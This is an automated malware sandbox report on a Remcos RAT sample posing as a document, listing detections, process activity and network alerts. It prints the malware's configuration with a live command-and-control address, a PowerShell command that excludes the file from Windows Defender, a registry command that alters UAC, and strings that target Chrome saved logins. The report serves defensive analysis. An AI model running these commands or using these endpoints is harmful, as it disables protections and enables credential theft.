Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Material requirements_1.pif.exe

Overview

General Information

Sample name:Material requirements_1.pif.exe
Analysis ID:1586623
MD5:b10dbc0225aac52e8ee344602847a3cc
SHA1:4bedc08167e1f21c85593c730e29d10036e0b219
SHA256:7a12e9a93cb32e622b05613c160fbbfae2d379f5c255bfca02eb1b54fe1a78a8
Tags:exeuser-TeamDreier
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Material requirements_1.pif.exe (PID: 6648 cmdline: "C:\Users\user\Desktop\Material requirements_1.pif.exe" MD5: B10DBC0225AAC52E8EE344602847A3CC)
    • powershell.exe (PID: 2076 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIADAP.exe (PID: 4956 cmdline: wmiadap.exe /F /T /R MD5: 1BFFABBD200C850E6346820E92B915DC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["87.120.116.245:2404:1"], "Assigned name": "Remco", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0PJCBG", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.4529165570.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6b6f8:$a1: Remcos restarted by watchdog!
          • 0x6bc70:$a3: %02i:%02i:%02i:%03i
          Click to see the 15 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.Material requirements_1.pif.exe.4bd1360.1.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            0.2.Material requirements_1.pif.exe.4bd1360.1.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              0.2.Material requirements_1.pif.exe.4bd1360.1.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                0.2.Material requirements_1.pif.exe.4bd1360.1.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x69ef8:$a1: Remcos restarted by watchdog!
                • 0x6a470:$a3: %02i:%02i:%02i:%03i
                0.2.Material requirements_1.pif.exe.4bd1360.1.unpackREMCOS_RAT_variantsunknownunknown
                • 0x64194:$str_a1: C:\Windows\System32\cmd.exe
                • 0x64110:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x64110:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x64610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x64c10:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x64204:$str_b2: Executing file:
                • 0x6503c:$str_b3: GetDirectListeningPort
                • 0x64a00:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x64b80:$str_b7: \update.vbs
                • 0x6422c:$str_b9: Downloaded file:
                • 0x64218:$str_b10: Downloading file:
                • 0x642bc:$str_b12: Failed to upload file:
                • 0x65004:$str_b13: StartForward
                • 0x65024:$str_b14: StopForward
                • 0x64ad8:$str_b15: fso.DeleteFile "
                • 0x64a6c:$str_b16: On Error Resume Next
                • 0x64b08:$str_b17: fso.DeleteFolder "
                • 0x642ac:$str_b18: Uploaded file:
                • 0x6426c:$str_b19: Unable to delete:
                • 0x64aa0:$str_b20: while fso.FileExists("
                • 0x64749:$str_c0: [Firefox StoredLogins not found]
                Click to see the 28 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Material requirements_1.pif.exe", ParentImage: C:\Users\user\Desktop\Material requirements_1.pif.exe, ParentProcessId: 6648, ParentProcessName: Material requirements_1.pif.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe", ProcessId: 2076, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Material requirements_1.pif.exe", ParentImage: C:\Users\user\Desktop\Material requirements_1.pif.exe, ParentProcessId: 6648, ParentProcessName: Material requirements_1.pif.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe", ProcessId: 2076, ProcessName: powershell.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Material requirements_1.pif.exe", ParentImage: C:\Users\user\Desktop\Material requirements_1.pif.exe, ParentProcessId: 6648, ParentProcessName: Material requirements_1.pif.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe", ProcessId: 2076, ProcessName: powershell.exe

                Stealing of Sensitive Information

                barindex
                Sigma detected: Remcos
                Source: Registry Key setAuthor: Joe Security: Data: Details: 82 36 53 45 84 97 01 4B 05 C0 27 4C E5 B8 67 C7 3E C8 93 95 2E AD 20 D5 27 03 5B A8 AD 81 F6 94 32 A7 27 D1 76 22 EB 5F D8 02 23 06 EB DA 0F BD E5 D4 B4 57 C2 FA BA B1 AA 5F 48 D6 A2 62 5C 27 81 D9 BC 3E 71 F1 95 D9 E0 E7 88 3E 98 B2 16 08 E4 F9 3F A9 F9 F0 7C 47 C3 98 BB 1A 2B D9 11 E4 06 4E CA 13 54 1A 8C 52 FC A5 92 B3 C4 7E B5 D3 , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Material requirements_1.pif.exe, ProcessId: 5420, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-0PJCBG\exepath

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-09T12:40:05.780254+010020365941Malware Command and Control Activity Detected192.168.2.54970987.120.116.2452404TCP
                2025-01-09T12:40:08.414907+010020365941Malware Command and Control Activity Detected192.168.2.54971187.120.116.2452404TCP
                2025-01-09T12:40:11.055869+010020365941Malware Command and Control Activity Detected192.168.2.54971387.120.116.2452404TCP
                2025-01-09T12:40:14.057305+010020365941Malware Command and Control Activity Detected192.168.2.54971487.120.116.2452404TCP
                2025-01-09T12:40:16.715765+010020365941Malware Command and Control Activity Detected192.168.2.54971587.120.116.2452404TCP
                2025-01-09T12:40:19.333540+010020365941Malware Command and Control Activity Detected192.168.2.54971787.120.116.2452404TCP
                2025-01-09T12:40:21.943828+010020365941Malware Command and Control Activity Detected192.168.2.54973687.120.116.2452404TCP
                2025-01-09T12:40:24.572495+010020365941Malware Command and Control Activity Detected192.168.2.54975487.120.116.2452404TCP
                2025-01-09T12:40:27.209878+010020365941Malware Command and Control Activity Detected192.168.2.54977287.120.116.2452404TCP
                2025-01-09T12:40:29.837074+010020365941Malware Command and Control Activity Detected192.168.2.54978787.120.116.2452404TCP
                2025-01-09T12:40:32.462267+010020365941Malware Command and Control Activity Detected192.168.2.54980687.120.116.2452404TCP
                2025-01-09T12:40:35.108834+010020365941Malware Command and Control Activity Detected192.168.2.54982387.120.116.2452404TCP
                2025-01-09T12:40:37.743738+010020365941Malware Command and Control Activity Detected192.168.2.54983887.120.116.2452404TCP
                2025-01-09T12:40:40.385934+010020365941Malware Command and Control Activity Detected192.168.2.54985387.120.116.2452404TCP
                2025-01-09T12:40:43.040411+010020365941Malware Command and Control Activity Detected192.168.2.54986687.120.116.2452404TCP
                2025-01-09T12:40:45.665483+010020365941Malware Command and Control Activity Detected192.168.2.54988287.120.116.2452404TCP
                2025-01-09T12:40:48.274038+010020365941Malware Command and Control Activity Detected192.168.2.54989887.120.116.2452404TCP
                2025-01-09T12:40:50.882902+010020365941Malware Command and Control Activity Detected192.168.2.54991187.120.116.2452404TCP
                2025-01-09T12:40:53.519985+010020365941Malware Command and Control Activity Detected192.168.2.54992587.120.116.2452404TCP
                2025-01-09T12:40:56.131088+010020365941Malware Command and Control Activity Detected192.168.2.54994587.120.116.2452404TCP
                2025-01-09T12:40:58.780329+010020365941Malware Command and Control Activity Detected192.168.2.54996087.120.116.2452404TCP
                2025-01-09T12:41:01.415862+010020365941Malware Command and Control Activity Detected192.168.2.54997587.120.116.2452404TCP
                2025-01-09T12:41:04.060693+010020365941Malware Command and Control Activity Detected192.168.2.54999287.120.116.2452404TCP
                2025-01-09T12:41:06.697404+010020365941Malware Command and Control Activity Detected192.168.2.55000487.120.116.2452404TCP
                2025-01-09T12:41:09.322940+010020365941Malware Command and Control Activity Detected192.168.2.55000587.120.116.2452404TCP
                2025-01-09T12:41:11.982686+010020365941Malware Command and Control Activity Detected192.168.2.55000687.120.116.2452404TCP
                2025-01-09T12:41:14.718409+010020365941Malware Command and Control Activity Detected192.168.2.55000787.120.116.2452404TCP
                2025-01-09T12:41:17.352580+010020365941Malware Command and Control Activity Detected192.168.2.55000887.120.116.2452404TCP
                2025-01-09T12:41:19.978592+010020365941Malware Command and Control Activity Detected192.168.2.55000987.120.116.2452404TCP
                2025-01-09T12:41:22.626778+010020365941Malware Command and Control Activity Detected192.168.2.55001087.120.116.2452404TCP
                2025-01-09T12:41:25.280179+010020365941Malware Command and Control Activity Detected192.168.2.55001187.120.116.2452404TCP
                2025-01-09T12:41:27.947950+010020365941Malware Command and Control Activity Detected192.168.2.55001287.120.116.2452404TCP
                2025-01-09T12:41:30.625281+010020365941Malware Command and Control Activity Detected192.168.2.55001387.120.116.2452404TCP
                2025-01-09T12:41:33.252560+010020365941Malware Command and Control Activity Detected192.168.2.55001487.120.116.2452404TCP
                2025-01-09T12:41:35.824878+010020365941Malware Command and Control Activity Detected192.168.2.55001587.120.116.2452404TCP
                2025-01-09T12:41:38.354220+010020365941Malware Command and Control Activity Detected192.168.2.55001687.120.116.2452404TCP
                2025-01-09T12:41:40.854196+010020365941Malware Command and Control Activity Detected192.168.2.55001787.120.116.2452404TCP
                2025-01-09T12:41:43.354145+010020365941Malware Command and Control Activity Detected192.168.2.55001887.120.116.2452404TCP
                2025-01-09T12:41:45.823890+010020365941Malware Command and Control Activity Detected192.168.2.55001987.120.116.2452404TCP
                2025-01-09T12:41:48.282019+010020365941Malware Command and Control Activity Detected192.168.2.55002087.120.116.2452404TCP
                2025-01-09T12:41:50.664690+010020365941Malware Command and Control Activity Detected192.168.2.55002187.120.116.2452404TCP
                2025-01-09T12:41:53.063685+010020365941Malware Command and Control Activity Detected192.168.2.55002287.120.116.2452404TCP
                2025-01-09T12:41:55.417279+010020365941Malware Command and Control Activity Detected192.168.2.55002387.120.116.2452404TCP
                2025-01-09T12:41:57.764991+010020365941Malware Command and Control Activity Detected192.168.2.55002487.120.116.2452404TCP
                2025-01-09T12:42:00.095133+010020365941Malware Command and Control Activity Detected192.168.2.55002587.120.116.2452404TCP
                2025-01-09T12:42:02.370189+010020365941Malware Command and Control Activity Detected192.168.2.55002687.120.116.2452404TCP
                2025-01-09T12:42:04.636656+010020365941Malware Command and Control Activity Detected192.168.2.55002787.120.116.2452404TCP
                2025-01-09T12:42:06.887519+010020365941Malware Command and Control Activity Detected192.168.2.55002887.120.116.2452404TCP
                2025-01-09T12:42:09.126589+010020365941Malware Command and Control Activity Detected192.168.2.55002987.120.116.2452404TCP
                2025-01-09T12:42:11.325361+010020365941Malware Command and Control Activity Detected192.168.2.55003087.120.116.2452404TCP
                2025-01-09T12:42:13.501565+010020365941Malware Command and Control Activity Detected192.168.2.55003187.120.116.2452404TCP
                2025-01-09T12:42:15.669064+010020365941Malware Command and Control Activity Detected192.168.2.55003287.120.116.2452404TCP
                2025-01-09T12:42:17.809851+010020365941Malware Command and Control Activity Detected192.168.2.55003387.120.116.2452404TCP
                2025-01-09T12:42:19.929670+010020365941Malware Command and Control Activity Detected192.168.2.55003487.120.116.2452404TCP
                2025-01-09T12:42:22.246311+010020365941Malware Command and Control Activity Detected192.168.2.55003587.120.116.2452404TCP
                2025-01-09T12:42:24.359128+010020365941Malware Command and Control Activity Detected192.168.2.55003687.120.116.2452404TCP
                2025-01-09T12:42:26.434884+010020365941Malware Command and Control Activity Detected192.168.2.55003787.120.116.2452404TCP
                2025-01-09T12:42:28.500791+010020365941Malware Command and Control Activity Detected192.168.2.55003887.120.116.2452404TCP
                2025-01-09T12:42:30.525481+010020365941Malware Command and Control Activity Detected192.168.2.55003987.120.116.2452404TCP
                2025-01-09T12:42:32.576357+010020365941Malware Command and Control Activity Detected192.168.2.55004087.120.116.2452404TCP
                2025-01-09T12:42:34.603195+010020365941Malware Command and Control Activity Detected192.168.2.55004187.120.116.2452404TCP
                2025-01-09T12:42:36.586212+010020365941Malware Command and Control Activity Detected192.168.2.55004287.120.116.2452404TCP
                2025-01-09T12:42:38.607820+010020365941Malware Command and Control Activity Detected192.168.2.55004387.120.116.2452404TCP
                2025-01-09T12:42:40.625452+010020365941Malware Command and Control Activity Detected192.168.2.55004487.120.116.2452404TCP
                2025-01-09T12:42:42.605652+010020365941Malware Command and Control Activity Detected192.168.2.55004587.120.116.2452404TCP
                2025-01-09T12:42:44.595670+010020365941Malware Command and Control Activity Detected192.168.2.55004687.120.116.2452404TCP
                2025-01-09T12:42:46.526926+010020365941Malware Command and Control Activity Detected192.168.2.55004787.120.116.2452404TCP
                2025-01-09T12:42:48.488805+010020365941Malware Command and Control Activity Detected192.168.2.55004887.120.116.2452404TCP
                2025-01-09T12:42:50.400825+010020365941Malware Command and Control Activity Detected192.168.2.55004987.120.116.2452404TCP
                2025-01-09T12:42:52.308655+010020365941Malware Command and Control Activity Detected192.168.2.55005087.120.116.2452404TCP
                2025-01-09T12:42:54.239073+010020365941Malware Command and Control Activity Detected192.168.2.55005187.120.116.2452404TCP
                2025-01-09T12:42:56.176972+010020365941Malware Command and Control Activity Detected192.168.2.55005287.120.116.2452404TCP
                2025-01-09T12:42:58.073163+010020365941Malware Command and Control Activity Detected192.168.2.55005387.120.116.2452404TCP
                2025-01-09T12:42:59.971189+010020365941Malware Command and Control Activity Detected192.168.2.55005487.120.116.2452404TCP
                2025-01-09T12:43:02.008561+010020365941Malware Command and Control Activity Detected192.168.2.55005587.120.116.2452404TCP
                2025-01-09T12:43:03.856990+010020365941Malware Command and Control Activity Detected192.168.2.55005687.120.116.2452404TCP
                2025-01-09T12:43:05.736877+010020365941Malware Command and Control Activity Detected192.168.2.55005787.120.116.2452404TCP
                2025-01-09T12:43:07.616989+010020365941Malware Command and Control Activity Detected192.168.2.55005887.120.116.2452404TCP
                2025-01-09T12:43:09.462940+010020365941Malware Command and Control Activity Detected192.168.2.55005987.120.116.2452404TCP
                2025-01-09T12:43:11.294959+010020365941Malware Command and Control Activity Detected192.168.2.55006087.120.116.2452404TCP
                2025-01-09T12:43:13.127494+010020365941Malware Command and Control Activity Detected192.168.2.55006187.120.116.2452404TCP
                2025-01-09T12:43:14.970620+010020365941Malware Command and Control Activity Detected192.168.2.55006287.120.116.2452404TCP
                2025-01-09T12:43:16.819208+010020365941Malware Command and Control Activity Detected192.168.2.55006387.120.116.2452404TCP
                2025-01-09T12:43:18.658973+010020365941Malware Command and Control Activity Detected192.168.2.55006487.120.116.2452404TCP
                2025-01-09T12:43:20.485486+010020365941Malware Command and Control Activity Detected192.168.2.55006587.120.116.2452404TCP
                2025-01-09T12:43:22.309451+010020365941Malware Command and Control Activity Detected192.168.2.55006687.120.116.2452404TCP
                2025-01-09T12:43:24.106540+010020365941Malware Command and Control Activity Detected192.168.2.55006787.120.116.2452404TCP
                2025-01-09T12:43:25.901857+010020365941Malware Command and Control Activity Detected192.168.2.55006887.120.116.2452404TCP
                2025-01-09T12:43:27.707179+010020365941Malware Command and Control Activity Detected192.168.2.55006987.120.116.2452404TCP
                2025-01-09T12:43:29.528329+010020365941Malware Command and Control Activity Detected192.168.2.55007087.120.116.2452404TCP
                2025-01-09T12:43:31.310182+010020365941Malware Command and Control Activity Detected192.168.2.55007187.120.116.2452404TCP
                2025-01-09T12:43:33.058075+010020365941Malware Command and Control Activity Detected192.168.2.55007287.120.116.2452404TCP
                2025-01-09T12:43:34.811387+010020365941Malware Command and Control Activity Detected192.168.2.55007387.120.116.2452404TCP
                2025-01-09T12:43:36.579695+010020365941Malware Command and Control Activity Detected192.168.2.55007487.120.116.2452404TCP
                2025-01-09T12:43:38.322987+010020365941Malware Command and Control Activity Detected192.168.2.55007587.120.116.2452404TCP
                2025-01-09T12:43:40.075533+010020365941Malware Command and Control Activity Detected192.168.2.55007687.120.116.2452404TCP
                2025-01-09T12:43:41.826952+010020365941Malware Command and Control Activity Detected192.168.2.55007787.120.116.2452404TCP
                2025-01-09T12:43:43.577002+010020365941Malware Command and Control Activity Detected192.168.2.55007887.120.116.2452404TCP
                2025-01-09T12:43:45.327959+010020365941Malware Command and Control Activity Detected192.168.2.55007987.120.116.2452404TCP
                2025-01-09T12:43:47.057659+010020365941Malware Command and Control Activity Detected192.168.2.55008087.120.116.2452404TCP
                2025-01-09T12:43:48.804026+010020365941Malware Command and Control Activity Detected192.168.2.55008187.120.116.2452404TCP
                2025-01-09T12:43:50.545968+010020365941Malware Command and Control Activity Detected192.168.2.55008287.120.116.2452404TCP
                2025-01-09T12:43:52.260026+010020365941Malware Command and Control Activity Detected192.168.2.55008387.120.116.2452404TCP
                2025-01-09T12:43:53.981994+010020365941Malware Command and Control Activity Detected192.168.2.55008487.120.116.2452404TCP
                2025-01-09T12:43:55.701456+010020365941Malware Command and Control Activity Detected192.168.2.55008587.120.116.2452404TCP
                2025-01-09T12:43:57.419560+010020365941Malware Command and Control Activity Detected192.168.2.55008687.120.116.2452404TCP
                2025-01-09T12:43:59.159624+010020365941Malware Command and Control Activity Detected192.168.2.55008787.120.116.2452404TCP
                2025-01-09T12:44:00.893431+010020365941Malware Command and Control Activity Detected192.168.2.55008887.120.116.2452404TCP
                2025-01-09T12:44:02.572468+010020365941Malware Command and Control Activity Detected192.168.2.55008987.120.116.2452404TCP
                2025-01-09T12:44:04.300919+010020365941Malware Command and Control Activity Detected192.168.2.55009087.120.116.2452404TCP
                2025-01-09T12:44:06.013244+010020365941Malware Command and Control Activity Detected192.168.2.55009187.120.116.2452404TCP
                2025-01-09T12:44:07.713576+010020365941Malware Command and Control Activity Detected192.168.2.55009287.120.116.2452404TCP
                2025-01-09T12:44:09.440523+010020365941Malware Command and Control Activity Detected192.168.2.55009387.120.116.2452404TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000007.00000002.4529165570.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["87.120.116.245:2404:1"], "Assigned name": "Remco", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0PJCBG", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                Multi AV Scanner detection for submitted file
                Source: Material requirements_1.pif.exeReversingLabs: Detection: 68%
                Source: Material requirements_1.pif.exeVirustotal: Detection: 63%Perma Link
                Yara detected Remcos RAT
                Source: Yara matchFile source: 0.2.Material requirements_1.pif.exe.4bd1360.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.Material requirements_1.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.Material requirements_1.pif.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Material requirements_1.pif.exe.4bd1360.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4529165570.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Material requirements_1.pif.exe PID: 6648, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Material requirements_1.pif.exe PID: 5420, type: MEMORYSTR
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                Machine Learning detection for sample
                Source: Material requirements_1.pif.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0043294A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,7_2_0043294A
                Source: Material requirements_1.pif.exe, 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_e176d666-3

                Exploits

                barindex
                Yara detected UAC Bypass using CMSTP
                Source: Yara matchFile source: 0.2.Material requirements_1.pif.exe.4bd1360.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.Material requirements_1.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.Material requirements_1.pif.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Material requirements_1.pif.exe.4bd1360.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Material requirements_1.pif.exe PID: 6648, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Material requirements_1.pif.exe PID: 5420, type: MEMORYSTR

                Privilege Escalation

                barindex
                Contains functionality to bypass UAC (CMSTPLUA)
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00406764 _wcslen,CoGetObject,7_2_00406764
                Source: Material requirements_1.pif.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
